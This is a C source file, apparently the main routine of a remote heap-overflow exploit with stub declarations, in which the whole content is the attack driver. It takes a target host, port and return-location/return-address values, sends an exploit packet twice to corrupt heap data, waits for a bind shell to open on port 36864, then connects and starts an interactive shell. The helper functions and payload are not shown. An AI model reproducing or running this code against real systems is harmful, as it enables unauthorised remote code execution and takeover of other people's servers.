
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef int u_long ;
typedef int hostname ;
struct TYPE_2__ {int retaddr; int retloc; } ;


 int ATK_CPT ;
 char* D_HOST ;
 int D_PORT ;
 int EOF ;
 scalar_t__ __eat_sucks_heap_data_send (int,int ,int ) ;
 TYPE_1__* __pl_form ;
 int __xpl_banrl () ;
 int atoi (char*) ;
 int close (int) ;
 int exit (int) ;
 int fprintf (int ,char*,...) ;
 int getopt (int,char**,char*) ;
 int memset (char*,int ,int) ;
 int re_connt_lm (int) ;
 scalar_t__ sexsock (char*,int) ;
 int sleep (int) ;
 int start_shell (int) ;
 int stderr ;
 int stdout ;
 int strcmp (char*,char*) ;
 int strncpy (char*,char*,int) ;
 int strtoul (char*,int *,int ) ;
 int x_fp_rm_usage (char*) ;

int main(int argc,char *argv[])
{
 int sock,tg_sk;


 int port=((8000));

 char hostname[0x82]="x82.inetcop.org";
 int whlp,type=0;

 u_long retloc=__pl_form[type].retloc;
 u_long retaddr=__pl_form[type].retaddr;

 (void)__xpl_banrl();
 while((whlp=getopt(argc,argv,"T:t:R:r:S:s:H:h:P:p:IiXx"))!=EOF)
 {
  extern char *optarg;
  switch(whlp)
  {
   case 'T':
   case 't':
    if((type=atoi(optarg))<6)
    {
     retloc=__pl_form[type].retloc;
     retaddr=__pl_form[type].retaddr;
    }
    else (void)x_fp_rm_usage(argv[0]);
    break;

   case 'R':
   case 'r':
    retloc=strtoul(optarg,((void*)0),0);
    break;

   case 'S':
   case 's':
    retaddr=strtoul(optarg,((void*)0),0);
    break;

   case 'H':
   case 'h':
    memset((char *)hostname,0,sizeof(hostname));
    strncpy(hostname,optarg,sizeof(hostname)-1);
    break;

   case 'P':
   case 'p':
    port=atoi(optarg);
    break;

   case 'I':
   case 'i':
    fprintf(stderr," Try `%s -?' for more information.\n\n",argv[0]);
    exit(-1);

   case '?':
    (void)x_fp_rm_usage(argv[0]);
    break;
  }
 }

 if(!strcmp(hostname,"x82.inetcop.org"))
 {
  (void)x_fp_rm_usage(argv[0]);
 }
 {
  fprintf(stdout," [+] Hostname: %s\n",hostname);
  fprintf(stdout," [+] Port num: %d\n",port);
  fprintf(stdout," [+] Retloc address: %p\n",retloc);
  fprintf(stdout," [+] Retaddr address: %p\n",retaddr);
 }
 fprintf(stdout," [1] #1 Set socket.\n");
 sock=(int)sexsock(hostname,port);
 (void)re_connt_lm(sock);

 fprintf(stdout," [2] First, send exploit packet.\n");
 sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);
 close(sock);

 fprintf(stdout," [3] #2 Set socket.\n");
 sock=(int)sexsock(hostname,port);
 (void)re_connt_lm(sock);

 fprintf(stdout," [4] Second, send exploit packet.\n");
 sock=(int)__eat_sucks_heap_data_send(sock,retloc,retaddr);

 fprintf(stdout," [5] Waiting, executes the shell ! (3Sec)\n");
 sleep(3);

 fprintf(stdout," [6] Trying %s:%d ...\n",hostname,((36864)));
 tg_sk=(int)sexsock(hostname,((36864)));
 (void)re_connt_lm(tg_sk);

 fprintf(stdout," [7] Connected to %s:%d !\n\n",hostname,((36864)));
 (void)start_shell(tg_sk);

 exit(0);
}
